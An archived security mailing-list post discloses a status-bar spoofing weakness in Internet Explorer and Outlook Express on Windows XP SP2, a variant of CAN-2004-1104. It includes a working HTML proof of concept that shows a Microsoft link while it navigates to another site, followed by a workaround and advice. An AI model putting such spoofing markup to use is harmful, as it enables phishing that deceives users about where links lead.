lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
From: bitlance_3 at hotmail.com (winter bitlance)
Subject: IE/OE Restricted Zone Status Bar Spoofing

Hi LIST.

It is normally possible for script code to manipulate information displayed 
in the status bar in the Internet Zone. By default, Outlook Express 6 open 
HTML e-mail messages in the Restricted sites zone instead of the Internet 
Zone. Outlook Express users may especially trust information displayed in 
the status bar since HTML documents are viewed in context of the 
"Restricted" zone, which has scripting support disabled.

However, errors in Internet Explorer allows manipulation of the status bar 
without using any script code. This can be exploited by embedding a 
specially crafted form in a link.

http-equiv has discovered a weakness in Internet Explorer, which 
potentially can be exploited by malicious people to trick users into 
visiting a malicious website which facilitates a "phishing" attack. ( 
CAN-2004-1104 )

Now another weakness which use a "label for id trick" has been discovered. 
This weakness is a variant of CAN-2004-1104.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!-- saved from url=(0007)http:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="http://www.example.com/?maliciouscontents">[/a>[/p>
[div>  
  [a href="http://www.microsoft.com/windows/default.mspx">
    [table>
      [caption>
        [a href="http://www.microsoft.com/windows/default.mspx ">
          [label for="SPOOF">
            [u style="cursor: pointer; color: blue">
              http://www.microsoft.com/windows/default.mspx
            [/u> 
          [/label>
        [/a>
      [/caption>
    [/table>
  [/a>
[/div>

- -----8<----- -----8<----- -----8<----- -----8<-----

workaround:( on Windows XP Service Pack 2 )

You can change the zone elevation setting under for each security zone by 
configuring the following option from Allow to Disabled or Prompt in the 
Custom Level Security dialog.
"Web sites in less privileged Web content zones can navigate into this 
zone"

http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx



Solution:
Never follow links from untrusted sources.

Read e-mail messages in plain text format if you are using Outlook Express 
6 SP1 or a later version , to help protect yourself from the HTML e-mail 
attack vector.

REGARDS.

-- 

bitlance winter

_________________________________________________________________
????250MB??????? ?MSN Hotmail? http://www.hotmail.com/ 


Powered by blists - more mailing lists